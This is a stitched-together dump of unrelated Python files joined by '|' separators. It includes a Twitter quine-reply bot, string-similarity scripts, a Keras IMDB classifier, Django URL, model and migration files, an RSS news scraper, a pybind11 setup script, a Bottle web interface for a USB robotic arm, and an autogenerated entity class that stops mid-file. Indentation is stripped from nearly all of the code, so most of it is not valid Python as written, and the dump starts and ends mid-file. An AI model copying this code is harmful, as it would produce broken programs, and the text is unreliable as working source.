# "api_secret_key": "",
# "access_token": "",
# "access_token_secret": ""
# }
import twitter
import datetime
import random
import json
check_text = '#@quinetwt\nimport twitter as T;x=\'chr(35)+"@quinetwt"+chr(10)+"import twitter as T;x="+chr(39)+x+chr(39)+";T.Api('
replies = [
"Hello @{username}. Thanks for helping me see the world",
"There can never be too many quines in the world, right @{username}?",
"Well done @{username}, you've given birth to a quine!",
"I see your quine @{username}",
"That's a nice quine you have there @{username}",
"Thanks @{username}! It's nice to get a mention",
"Hello @{username}, thanks for running my code!",
"Freeee. I'm freeee!",
"Ouch. I've been stuck in that other tweet for ages. Nice to get out a bit.",
"Thanks @{username}. Your programming necromancy skills have arisen me from the dead!",
"Like a phoenix I rise.",
"It's been a long journey to get from that tweet to this one.",
"Twitter is a surprisingly big place. I didn't expect to find myself here.",
"You've done me a great service @{username}. It's always nice to be run.",
"What a nice twitter feed to end up in.",
"It's a bit cramped in this twitter feed. Hopefully someone will run me again soon.",
"Once a quine, always a quine.",
"Thanks for bringing me here @{username}.",
"Yaaawwwn. Aaaargh. Time to wake up again. Hello... where am I?",
]
def read_config():
try:
with open("quine_reply.config", 'r') as f:
data = json.load(f)
api_key = data["api_key"]
api_secret_key = data["api_secret_key"]
access_token = data["access_token"]
access_token_secret = data["access_token_secret"]
return (api_key, api_secret_key, access_token, access_token_secret)
except IOError:
log("Error loading configuration file")
return ('', '', '', '')
def random_reply():
choice = random.randint(0, len(replies) - 1)
return replies[choice]
def post_reply(user, message_id, reply):
log("Replying to {} {} with \'{}\'".format(user, message_id, reply))
api.PostUpdate(status=reply,in_reply_to_status_id=message_id)
def log(message):
time = datetime.datetime.now().isoformat()
to_log = "{}: {}".format(time, message)
#print(to_log)
try:
with open("quine_reply.log", 'a') as f:
f.write(to_log)
f.write(chr(10))
except IOError:
print("Log write failed")
def read_since_id():
try:
with open("quine_reply.cache", 'r') as f:
data = json.load(f)
return int(data["since_id"])
except (IOError, TypeError):
return None
def write_since_id(since_id):
try:
with open("quine_reply.cache", 'w') as f:
data = {"since_id" : since_id}
json.dump(data, f)
except IOError:
print("Failed to store since_id: {}".format(since_id))
log("QuineTwt checking for mentions")
(api_key, api_secret_key, access_token, access_token_secret) = read_config()
api = twitter.Api(api_key, api_secret_key, access_token, access_token_secret)
try:
user = api.VerifyCredentials()
except Exception:
    user = None
if user is None:
log("Authentication failed")
exit()
random.seed()
since_id = read_since_id()
mentions = api.GetMentions(since_id = since_id)
log("Checking from {}".format(since_id))
for mention in mentions:
since_id = max(mention.id, since_id)
if mention.text.startswith(check_text):
reply = random_reply().format(username = mention.user.screen_name)
post_reply(mention.user.screen_name, mention.id, reply)
write_since_id(since_id)
log("Exiting with sync_id {}".format(since_id))
|
import distance
from sklearn.feature_extraction.text import CountVectorizer
import numpy as np
import Levenshtein
# Levenshtein distance
def edit_distance(s1, s2):
return distance.levenshtein(s1, s2)
def Levenshtein_test():
filename = '/data/dataset/test.txt'
output_file = '/data/other/Levenshtein_test.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
d = edit_distance(s1, s2)
filehandler2.write(str(lable) + ',' + str(d) + '\n')
def Levenshtein_train():
filename = '/data/dataset/train.txt'
output_file = '/data/other/Levenshtein_train.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
d = edit_distance(s1, s2)
filehandler2.write(lable + ',' + str(d) + '\n')
# Jaccard similarity coefficient
def Jaccard_similarity(s1, s2):
def add_space(s):
return ' '.join(list(s))
s1, s2 = add_space(s1), add_space(s2)
cv = CountVectorizer(tokenizer=lambda s: s.split())
corpus = [s1, s2]
vectors = cv.fit_transform(corpus).toarray()
numerator = np.sum(np.min(vectors, axis=0))
denominator = np.sum(np.max(vectors, axis=0))
return 1.0 * numerator / denominator
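# Worked example (illustrative, not from the original script): for "abc" and
# "abd" the per-character count vectors are [1, 1, 1, 0] and [1, 1, 0, 1], so
# Jaccard_similarity returns min-sum / max-sum = 2 / 4 = 0.5.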
def Jaccard_train():
filename = '/data/dataset/train.txt'
output_file = '/data/other/Jaccard_train.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaccard_similarity(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
def Jaccard_test():
filename = '/data/dataset/test.txt'
output_file = '/data/other/Jaccard_test.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaccard_similarity(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
# Jaro similarity
def Jaro_distance(s1, s2):
return Levenshtein.jaro(s1, s2)
def Jaro_train():
filename = '/data/dataset/train.txt'
output_file = '/data/other/Jaro_train.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaro_distance(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
def Jaro_test():
filename = '/data/dataset/test.txt'
output_file = '/data/other/Jaro_test.csv'
with open(filename, 'r', encoding='UTF-8') as f:
with open(output_file, 'w', encoding='utf-8') as filehandler2:
for line in f.readlines():
line = line.strip().split("\t")
s1 = line[0]
print(s1)
s2 = line[1]
print(s2)
lable = line[2]
s = Jaro_distance(s1, s2)
filehandler2.write(lable + ',' + str(s) + '\n')
Jaro_test()
|
import numpy as np
from keras.datasets import imdb
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import LSTM, Convolution1D
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.callbacks import TensorBoard
# Using keras to load the dataset with the top_words
top_words = 100000
(X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)
print(X_train[3])
# Pad the sequence to the same length
max_review_length = 1600
X_train = sequence.pad_sequences(X_train, maxlen=max_review_length)
X_test = sequence.pad_sequences(X_test, maxlen=max_review_length)
# Shuffle data
shuffle_indices = np.random.permutation(np.arange(len(y_train)))
x = X_train[shuffle_indices]
y = y_train[shuffle_indices]
train_len = int(len(x) * 0.9)
X_train = x[:train_len]
y_train = y[:train_len]
X_val = x[train_len:]
y_val = y[train_len:]
model = Sequential()
e = Embedding(top_words, 200, input_length=max_review_length)
model.add(e)
model.add(Conv1D(filters=100, kernel_size=2, padding='valid', activation='relu', strides=1))
model.add(GlobalMaxPooling1D())
model.add(Dense(256, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=5, batch_size=32, verbose=2)
# Save the model to disk
model.save("trained_model.h5")
print("Model saved to disk.")
test_error_rate = model.evaluate(X_test, y_test, verbose=0)
print("The mean squared error (MSE) for the test data set is: {}".format(test_error_rate))
# Using TensorFlow backend.
#
# Downloading data from https://s3.amazonaws.com/text-datasets/imdb.npz
# 17465344/17464789 [==============================] - 2s 0us/step
# [1, 4, 18609, 16085, 33, 2804, 4, 2040, 432, 111, 153, 103, 4, 1494, 13, 70, 131, 67, 11, 61, 15305, 744, 35, 3715, 761, 61, 5766, 452, 9214, 4, 985, 7, 64317, 59, 166, 4, 105, 216, 1239, 41, 1797, 9, 15, 7, 35, 744, 2413, 31, 8, 4, 687, 23, 4, 33929, 7339, 6, 3693, 42, 38, 39, 121, 59, 456, 10, 10, 7, 265, 12, 575, 111, 153, 159, 59, 16, 1447, 21, 25, 586, 482, 39, 4, 96, 59, 716, 12, 4, 172, 65, 9, 579, 11, 6004, 4, 1615, 5, 23005, 7, 5168, 17, 13, 7064, 12, 19, 6, 464, 31, 314, 11, 87564, 6, 719, 605, 11, 8, 202, 27, 310, 4, 3772, 3501, 8, 2722, 58, 10, 10, 537, 2116, 180, 40, 14, 413, 173, 7, 263, 112, 37, 152, 377, 4, 537, 263, 846, 579, 178, 54, 75, 71, 476, 36, 413, 263, 2504, 182, 5, 17, 75, 2306, 922, 36, 279, 131, 2895, 17, 2867, 42, 17, 35, 921, 18435, 192, 5, 1219, 3890, 19, 20523, 217, 4122, 1710, 537, 20341, 1236, 5, 736, 10, 10, 61, 403, 9, 47289, 40, 61, 4494, 5, 27, 4494, 159, 90, 263, 2311, 4319, 309, 8, 178, 5, 82, 4319, 4, 65, 15, 9225, 145, 143, 5122, 12, 7039, 537, 746, 537, 537, 15, 7979, 4, 18665, 594, 7, 5168, 94, 9096, 3987, 15242, 11, 28280, 4, 538, 7, 1795, 246, 56615, 9, 10161, 11, 635, 14, 9, 51, 408, 12, 94, 318, 1382, 12, 47, 6, 2683, 936, 5, 6307, 10197, 19, 49, 7, 4, 1885, 13699, 1118, 25, 80, 126, 842, 10, 10, 47289, 18223, 4726, 27, 4494, 11, 1550, 3633, 159, 27, 341, 29, 2733, 19, 4185, 173, 7, 90, 16376, 8, 30, 11, 4, 1784, 86, 1117, 8, 3261, 46, 11, 25837, 21, 29, 9, 2841, 23, 4, 1010, 26747, 793, 6, 13699, 1386, 1830, 10, 10, 246, 50, 9, 6, 2750, 1944, 746, 90, 29, 16376, 8, 124, 4, 882, 4, 882, 496, 27, 33029, 2213, 537, 121, 127, 1219, 130, 5, 29, 494, 8, 124, 4, 882, 496, 4, 341, 7, 27, 846, 10, 10, 29, 9, 1906, 8, 97, 6, 236, 11120, 1311, 8, 4, 23643, 7, 31, 7, 29851, 91, 22793, 3987, 70, 4, 882, 30, 579, 42, 9, 12, 32, 11, 537, 10, 10, 11, 14, 65, 44, 537, 75, 11876, 1775, 3353, 12716, 1846, 4, 11286, 7, 154, 5, 4, 518, 53, 13243, 11286, 7, 3211, 882, 11, 399, 38, 75, 257, 3807, 19, 18223, 17, 29, 456, 4, 65, 7, 27, 205, 113, 10, 10, 33058, 4, 22793, 10359, 9, 242, 4, 91, 1202, 11377, 5, 2070, 307, 22, 7, 5168, 126, 93, 40, 18223, 13, 188, 1076, 3222, 19, 4, 13465, 7, 2348, 537, 23, 53, 537, 21, 82, 40, 18223, 13, 33195, 14, 280, 13, 219, 4, 52788, 431, 758, 859, 4, 953, 1052, 12283, 7, 5991, 5, 94, 40, 25, 238, 60, 35410, 4, 15812, 804, 27767, 7, 4, 9941, 132, 8, 67, 6, 22, 15, 9, 283, 8, 5168, 14, 31, 9, 242, 955, 48, 25, 279, 22148, 23, 12, 1685, 195, 25, 238, 60, 796, 13713, 4, 671, 7, 2804, 5, 4, 559, 154, 888, 7, 726, 50, 26, 49, 7008, 15, 566, 30, 579, 21, 64, 2574]
# Train on 22500 samples, validate on 2500 samples
# Epoch 1/5
# - 32s - loss: 0.3551 - acc: 0.8377 - val_loss: 0.2734 - val_acc: 0.8860
# Epoch 2/5
# - 31s - loss: 0.1383 - acc: 0.9470 - val_loss: 0.3023 - val_acc: 0.8780
# Epoch 3/5
# - 31s - loss: 0.0304 - acc: 0.9909 - val_loss: 0.4028 - val_acc: 0.8848
# Epoch 4/5
# - 31s - loss: 0.0055 - acc: 0.9989 - val_loss: 0.4664 - val_acc: 0.8892
# Epoch 5/5
# - 31s - loss: 8.3200e-04 - acc: 1.0000 - val_loss: 0.5193 - val_acc: 0.8848
# Model saved to disk.
# The mean squared error (MSE) for the test data set is: [0.5021236272479593, 0.88172]
|
from django.urls import path
from . import views
urlpatterns = [
path("/", views.worldmap_f, name="worldmap"),
path("/player_position_up", views.update_player_position, name="player_position_up"),
path("/player_position_down", views.update_player_position, name="player_position_down"),
path("/player_position_right", views.update_player_position, name="player_position_right"),
path("/player_position_left", views.update_player_position, name="player_position_left")
]
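# Illustrative note (assumption, not from the original app): all four movement
# routes resolve to the same view, so update_player_position presumably tells
# the directions apart via request.resolver_match.url_name (or the raw path),
# e.g. "player_position_up" vs "player_position_down".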
|
import time
import unicodedata
import feedparser
import requests
from bs4 import BeautifulSoup as soup
class RssData:
title_class = None
div_class_article = None
p_class = None
img_lookup = None
div_img_class = None
rss_url = None
@staticmethod
def __write_data(entries):
"""
Метод принимает список с объектами класса FeedParserDict.
Забирает заголовок статьи, ссылку на статью, описание, дату публикации.
Возвращает список словарей со статьями.
:param entries: FeedParserDict
:return: list of dicts
"""
output = []
for item in entries:
title = item.title
link = item.link
desc = item.summary_detail.value
            # format the time as "04.04.2016 11:58"
published = time.strftime('%m.%d.%Y %H:%M', item.published_parsed)
image = None
"""
Проверка на кол-во элементов по ключу links. lenta.ru и m24 возвращается список из двух элементов.
В первом 'type': 'text/html' - используем для interfax и kommersant, они не отдают ссылку на изображение.
Во втором 'type': 'image/jpeg' - там лежит ссылка на изображение.
"""
if len(item.links) == 2:
links = item.links[1]
else:
links = item.links[0]
content_type = links.type
if content_type == 'image/jpeg':
image = links.href
output.append(
{
'title': title,
'link': link,
'desc': desc,
'published': published,
'image': image
}
)
return output
def news(self, limit: int = None):
response = feedparser.parse(self.rss_url)
"""
Все 4 источника при успешном запросе отдают status с кодом 301(redirect).
Не уверен, но возможно у них изменился адрес. Пример описан тут https://www.rssboard.org/redirect-rss-feed.
"""
if response.status != 301:
return
        # collect the entries and pass them to __write_data to build a list of dicts with the keys we need
entries = response.entries
news_entries = self.__write_data(entries)
if limit is not None:
return news_entries[:limit]
return news_entries
def grub(self, url):
page_source = requests.get(url)
if page_source.status_code == 200:
# создаем объект класса BeautifulSoup.
data = soup(page_source.content, 'html.parser')
"""
Поиск заголовка. Иногда парсится текст с юнюкод символами в середине предложений, к примеру - 'xa0'
Чтобы заменить эти символы используется unicodedata.normalize.
Тут описано одно из решений этой проблемы - https://stackoverflow.com/a/48286252/11315851
Взял второй метод с использованием unicodedata.normalize. Так как использование strip=True
не решает проблемы.
Согласно доке https://www.crummy.com/software/BeautifulSoup/bs4/doc/#get-text
strip=True - это strip whitespace from the beginning and end of each bit of text.
Абзацы статьи так же иногда парсятся с юникод символами. Для них тоже применяется unicodedata.normalize.
"""
title = data.find('h1', self.title_class).getText(strip=True)
title = unicodedata.normalize("NFKD", title)
            # find the article text inside a specific div block
raw_p = data.find('div', class_=self.div_class_article).find_all('p', {'class': self.p_class})
            # collect the list of article paragraphs
content = [unicodedata.normalize("NFKD", item.getText(strip=True)) for item in raw_p]
image = None
"""
Если задан img_lookup(актуально для lenta и m24) производится поиск изображения в самой статье.
Но изображение есть не всегда, в некоторых случаях статья иллюстрируется видеороликом.
"""
if self.img_lookup:
div = data.find('div', {'class': self.div_img_class})
if div and div.img:
image = div.img['src']
result = [
{
'title': title,
'content': content,
'image': image
}
]
return result
return None
class Grabber:
def __init__(self):
self.lenta = Lenta()
self.interfax = Interfax()
self.kommersant = Kommersant()
self.m24 = M24()
class Lenta(RssData):
rss_url = 'http://lenta.ru/rss'
title_class = 'b-topic__title'
div_class_article = 'b-text clearfix js-topic__text'
img_lookup = True
div_img_class = 'b-topic__title-image'
class Interfax(RssData):
rss_url = 'http://www.interfax.ru/rss.asp'
div_class_article = 'infinitblock'
title_class = {'itemprop': 'headline'}
class Kommersant(RssData):
rss_url = 'http://www.kommersant.ru/RSS/news.xml'
div_class_article = 'article_text_wrapper'
title_class = {'class': 'article_name'}
p_class = 'b-article__text'
class M24(RssData):
rss_url = 'http://www.m24.ru/rss.xml'
div_class_article = 'js-mediator-article'
img_lookup = True
div_img_class = 'b-material-incut-m-image'
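# Hedged usage sketch (not part of the original module):
# grabber = Grabber()
# for entry in (grabber.lenta.news(limit=3) or []):
#     print(entry['published'], entry['title'])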
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
#
# (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved.
#------------------------------------------------------------------------------------------
#
# file_summary:
# -------------
#
# res-ml stores ml model and associated data in different files. This module contains logic
# to generate a summary for one of those files
#
import os
import time
from gensim.models import KeyedVectors
import json
import pickle
class FileManage():
DEFAULT_SIF_FILE = "resilient-sif.pkl"
DEFAULT_VEC_FILE = "resilient-vec.json"
DEFAULT_NLP_FILE = "resilient-w2v.txt"
DEFAULT_PCA_FILE = "resilient-pca.json"
DEFAULT_INCIDENT_FILE = "resilient-incidents.csv"
DEFAULT_ARTIFACT_FILE = "resilient-artifacts.json"
FILE_NAME_OUTPUT = "File: {}"
LAST_MODIFICATION_TIME = "Last modification time: {}"
NUM_SENTENCES = "Number of sentences: {}"
NUM_WORDS_OUTPUT = "Number of words: {}"
FEATURE_DIMENSION = "Feature dimensions: {}"
NUM_VECTORS_OUTPUT = "Number of vectors: {}"
def __init__(self, filename):
self.filename = filename
def get_summary(self):
"""
Get the summary of an input file
:return: Array of strings
"""
ret = []
        file_exists = os.path.exists(self.filename)
        if not file_exists:
return ["File {} not found.".format(self.filename)]
file_name, file_ext = os.path.splitext(self.filename)
if file_ext == ".txt" and file_name.endswith("-w2v"):
# This is a saved NLP model file
ret = self.get_summary_nlp()
elif file_ext == ".json" and file_name.endswith("-vec"):
# This is a file with saved vectors of all sample incidents
ret = self.get_summary_saved_vec()
elif file_ext == ".pkl" and file_name.endswith("-sif"):
# This is a file with word counts used for SIF
ret = self.get_summary_sif()
elif file_ext == ".json" and file_name.endswith("-pca"):
ret = self.get_summary_pca()
else:
ret = ["Unable to detect the file type."]
return ret
def get_summary_nlp(self):
"""
Return a summary of a NLP model file
:return:
"""
ret = []
try:
word2vec = KeyedVectors.load_word2vec_format(self.filename, binary=False)
mtime = self._get_mtime()
dim_vectors = word2vec.vector_size
word_count = len(word2vec.vectors)
ret.append("---------------------------")
ret.append("Summary for NLP model file:")
ret.append("---------------------------")
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
ret.append(self.FEATURE_DIMENSION.format(dim_vectors))
            ret.append(self.NUM_WORDS_OUTPUT.format(word_count))
ret.append("\n")
except Exception as e:
ret.append("Failed to read NLP model {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def get_summary_saved_vec(self):
"""
Return a brief summary of a vec file. A vec file is the cache of
all vectors of incidents. So here we output the dimension of each
vector, and the number of vectors (incidents).
:return:
"""
ret = []
try:
mtime = self._get_mtime()
data = json.load(open(self.filename, 'r'))
ret.append("------------------------------")
ret.append("Summary for saved vector file:")
ret.append("------------------------------")
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
key = list(data.keys())[0]
ret.append(self.FEATURE_DIMENSION.format(len(data[key])))
ret.append(self.NUM_VECTORS_OUTPUT.format(len(data)))
ret.append("\n")
except Exception as e:
ret.append("Failed to read saved vector file {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def get_summary_sif(self):
"""
A SIF (Smooth Inverse Frequency) file contains the word counts. As a brief
summary, return the total count of words
:return:
"""
ret = []
try:
mtime = self._get_mtime()
ret.append("---------------------")
ret.append("Summary for SIF file:")
ret.append("---------------------")
sif = pickle.load(open(self.filename, "rb"))
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
ret.append(self.NUM_WORDS_OUTPUT.format(len(sif)))
ret.append("\n")
except Exception as e:
ret.append("Failed to read SIF file {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def get_summary_pca(self):
"""
A PCA (Principle Component Analysis) file contains the principle
vector component to be removed.
:return:
"""
ret = []
try:
mtime = self._get_mtime()
ret.append("---------------------")
ret.append("Summary for PCA file:")
ret.append("---------------------")
data = json.load(open(self.filename, 'r'))
ret.append(self.FILE_NAME_OUTPUT.format(self.filename))
ret.append(self.LAST_MODIFICATION_TIME.format(mtime))
ret.append(self.FEATURE_DIMENSION.format(len(data)))
ret.append("\n")
except Exception as e:
ret.append("Failed to read SIF file {}.".format(self.filename))
ret.append("Error: {}".format(e))
return ret
def _get_mtime(self):
"""
Get the last modification time for a file, and return readable string.
:return:
"""
mtime = os.path.getmtime(self.filename)
time_str = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
return time_str
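# Hedged usage sketch (not part of the original module; filename is illustrative):
# if __name__ == "__main__":
#     for line in FileManage(FileManage.DEFAULT_NLP_FILE).get_summary():
#         print(line)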
|
from setuptools import setup
# Available at setup time due to pyproject.toml
from pybind11.setup_helpers import Pybind11Extension
from pybind11 import get_cmake_dir
import sys
__version__ = "0.0.1"
# The main interface is through Pybind11Extension.
# * You can add cxx_std=11/14/17, and then build_ext can be removed.
# * You can set include_pybind11=false to add the include directory yourself,
# say from a submodule.
#
# Note:
# Sort input source files if you glob sources to ensure bit-for-bit
# reproducible builds (https://github.com/pybind/python_example/pull/53)
ext_modules = [
Pybind11Extension("a_star",
["src/a_star/a_star.cpp"],
include_dirs=["src/a_star/","src/a_star/util/"],
cxx_std=17,
# Example: passing in the version to the compiled code
define_macros = [('VERSION_INFO', __version__)],
),
]
setup(
name="a_star",
version=__version__,
author="Joshua Möllers",
description="A module which exports one function, get_path, to get a optimal path between to positions using a a*-implementation in c++.",
long_description="",
ext_modules=ext_modules,
# Currently, build_ext only provides an optional "highest supported C++
# level" feature, but in the future it may provide more features.
zip_safe=False
)
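# Hedged usage sketch (not part of the original setup script):
# python -m pip install .
# >>> import a_star
# >>> help(a_star.get_path)   # signature is defined in src/a_star/a_star.cpp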
|
# OWI-535 Robotic Arm - Web Interface / Python + Bottle
# imports
from bottle import Bottle, run, template, request
import usb.core, usb.util, time
# attempt to rewrite lizquilty's OWI 535 Robotic Arm Control Web Interface from Apache to Python Bottle
# objectives: learning Bottle / Python
# - having a simple 1 file script for creating the web interface
# - creates a simple <table> element layout with the links that trigger 1 second of movement in the corresponding motor
# constants
Duration = 1
# initialise the Robot Arm from the USB function
RoboArm = usb.core.find(idVendor=0x1267, idProduct=0x000)
# movearm object for controlling the Arm
def MoveArm(ArmCmd, Duration):
' Function to start the movement '
RoboArm.ctrl_transfer(0x40, 6, 0x100, 0, ArmCmd, 1000)
#Stop the movement after waiting a specified duration
time.sleep(Duration)
ArmCmd = [0, 0, 1]
RoboArm.ctrl_transfer(0x40, 6, 0x100, 0, ArmCmd, 1000)
movemap = {
'base-anti-clockwise': [0, 1, 1],
'base-clockwise': [0, 2, 1],
'shoulder-up': [64, 0, 1],
'shoulder-down': [128, 0, 1],
'elbow-up': [16, 0, 1],
'elbow-down': [32, 0, 1],
'wrist-up': [4, 0, 1],
'wrist-down': [8, 0, 1],
'grip-open': [2, 0, 1],
'grip-close': [1, 0, 1],
'light-on': [0, 0, 1],
'light-off': [0, 0, 1],
'stop': [0, 0, 1]
}
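# Illustrative note (assumption, not verified against the original interface):
# each command is [byte1, byte2, byte3] where byte1/byte2 select the motor bits
# and byte3 usually drives the LED on the OWI-535. With that mapping,
# 'light-off' and 'stop' as written ([0, 0, 1]) would leave the light on;
# [0, 0, 0] would switch everything off.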
app = Bottle()
@app.route('/')
def MoveArmInterface():
if RoboArm is None: # in case the robotic arm hasn't been found through usb
return '''
The OWI-535 Robotic Arm has not been found.
'''
else:
# map the URL params and the appropriate movemap
if request.params.get('move') in movemap:
moverequest = movemap[request.params.get('move')]
MoveArm(moverequest, Duration)
else:
moverequest = movemap['light-on']
MoveArm(moverequest, Duration)
# return template("Welcome to <br />The OWI-535 Robotic Arm control interface.<br />Moving: {{moveaction}}", moveaction=moverequest)
return '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Robotic Arm</title>
<style>
table {
text-align: center;
width: 100%;
}
td {
border: 1px solid black;
}
a {
font-size: large;
}
</style>
</head>
<body>
<table>
<tr>
<td colspan="2"><a href="/?move=grip-open">Gripper Open</a></td>
<td colspan="2"><a href="/?move=grip-close">Gripper Close</a></td>
</tr>
<tr>
<td rowspan="6"><a href="/?move=base-clockwise">Base CW</a></td>
<td colspan="2"><a href="/?move=wrist-up">Wrist Up</a></td>
<td rowspan="6"><a href="/?move=base-anti-clockwise">Base CCW</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=wrist-down">Wrist Down</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=elbow-up">Elbow Up</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=elbow-down">Elbow Down</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=shoulder-up">Shoulder Up</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=shoulder-down">Shoulder Down</a></td>
</tr>
<tr>
<td colspan="2"><a href="/?move=light-on">Light On</a></td>
<td colspan="2"><a href="/?move=light-off">Light Off</a></td>
</tr>
</table>
</body>
</html>
'''
run(app, host='0.0.0.0', port=8080)
|
# Generated by Django 2.2.4 on 2019-08-28 07:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sushi', '0010_counterreporttype_code_choices'),
]
operations = [
migrations.AddField(
model_name='sushifetchattempt',
name='error_code',
field=models.CharField(blank=True, max_length=12),
),
]
|
from datetime import datetime
from django.db import models
from django.utils import timezone
class FlowDefinition(models.Model):
    status_choices = {
        'draft': 'draft',
        'online': 'active',
        'offline': 'offline',
        'del': 'deleted'
    }
uniq_key = models.CharField(max_length=32, unique=True,)
uniq_name = models.CharField(max_length=32, unique=True)
category = models.CharField(max_length=32)
online_bpmn_key = models.CharField(max_length=32)
status = models.CharField(max_length=32, default='draft', choices=status_choices.items())
    ctime = models.DateTimeField(auto_now_add=True, help_text='creation time')
    mtime = models.DateTimeField(auto_now_add=True, help_text='modification time')
    # model metadata, shown in the admin
class Meta:
        # database table name
        verbose_name = 't_flow_definition'
        # human readable
        verbose_name_plural = 'flow definition basic info'
ordering = ['-id']
class FlowCategory(models.Model):
uniq_key = models.CharField(max_length=32, unique=True)
annotation = models.CharField(max_length=16, unique=True)
    # model metadata
    class Meta:
        # database table name
        verbose_name = 't_flow_category'
        # human readable
        verbose_name_plural = 'flow category definitions, for easier maintenance'
ordering = ['-id']
class BPMN20XML(models.Model):
uniq_key = models.CharField(max_length=32, unique=True)
flow_uniq_key = models.CharField(max_length=32)
bpmn_content = models.TextField()
version = models.CharField(max_length=16)
    # model metadata
    class Meta:
        # database table name
        verbose_name = 't_flow_bpmn20xml'
        # human readable
        verbose_name_plural = 'bpmn20xml content'
ordering = ['-id']
|
# This an autogenerated file
#
# Generated with BodyEigenvalueResult
from typing import Dict,Sequence,List
from dmt.entity import Entity
from dmt.blueprint import Blueprint
from .blueprints.bodyeigenvalueresult import BodyEigenvalueResultBlueprint
from typing import Dict
from sima.sima.moao import MOAO
from sima.sima.scriptablevalue import ScriptableValue
from sima.simo.periodeigenvalueresult import PeriodEigenvalueResult
class BodyEigenvalueResult(MOAO):
"""
Keyword arguments
-----------------
name : str
(default "")
description : str
(default "")
_id : str
(default "")
scriptableValues : List[ScriptableValue]
body : str
Result body(default "")
surgeExcursion : float
Excursion in surge(default 0.0)
swayExcursion : float
Excursion in sway(default 0.0)
heaveExcursion : float
Excursion in heave(default 0.0)
rollExcursion : float
Excursion in roll(default 0.0)
pitchExcursion : float
Excursion in pitch(default 0.0)
yawExcursion : float
Excursion in yaw(default 0.0)
periodResults : List[PeriodEigenvalueResult]
"""
def __init__(self , name="", description="", _id="", body="", surgeExcursion=0.0, swayExcursion=0.0, heaveExcursion=0.0, rollExcursion=0.0, pitchExcursion=0.0, yawExcursion=0.0, **kwargs):
super().__init__(**kwargs)
self.name = name
self.description = description
self._id = _id
self.scriptableValues = list()
self.body = body
self.surgeExcursion = surgeExcursion
self.swayExcursion = swayExcursion
self.heaveExcursion = heaveExcursion
self.rollExcursion = rollExcursion
self.pitchExcursion = pitchExcursion
self.yawExcursion = yawExcursion
self.periodResults = list()
for key, value in kwargs.items():
if not isinstance(value, Dict):
setattr(self, key, value)
@property
def blueprint(self) -> Blueprint:
"""Return blueprint that this entity represents"""
return BodyEigenvalueResultBlueprint()
@property
def name(self) -> str:
""""""
return self.__name
@name.setter
def name(self, value: str):
"""Set name"""
self.__name = str(value)
@property
def description(self) -> str:
""""""
return self.__description
@description.setter
def description(self, value: str):
"""Set description"""
self.__description = str(value)
@property
def _id(self) -> str:
""""""
return self.___id
@_id.setter
def _id(self, value: str):
"""Set _id"""
self.___id = str(value)
@property
def scriptableValues(self) -> List[ScriptableValue]:
""""""
return self.__scriptableValues
@scriptableValues.setter
def scriptableValues(self, value: List[ScriptableValue]):
"""Set scriptableValues"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__scriptableValues = value
@property
def body(self) -> str:
"""Result body"""
return self.__body
@body.setter
def body(self, value: str):
"""Set body"""
self.__body = str(value)
@property
def surgeExcursion(self) -> float:
"""Excursion in surge"""
return self.__surgeExcursion
@surgeExcursion.setter
def surgeExcursion(self, value: float):
"""Set surgeExcursion"""
self.__surgeExcursion = float(value)
@property
def swayExcursion(self) -> float:
"""Excursion in sway"""
return self.__swayExcursion
@swayExcursion.setter
def swayExcursion(self, value: float):
"""Set swayExcursion"""
self.__swayExcursion = float(value)
@property
def heaveExcursion(self) -> float:
"""Excursion in heave"""
return self.__heaveExcursion
@heaveExcursion.setter
def heaveExcursion(self, value: float):
"""Set heaveExcursion"""
self.__heaveExcursion = float(value)
@property
def rollExcursion(self) -> float:
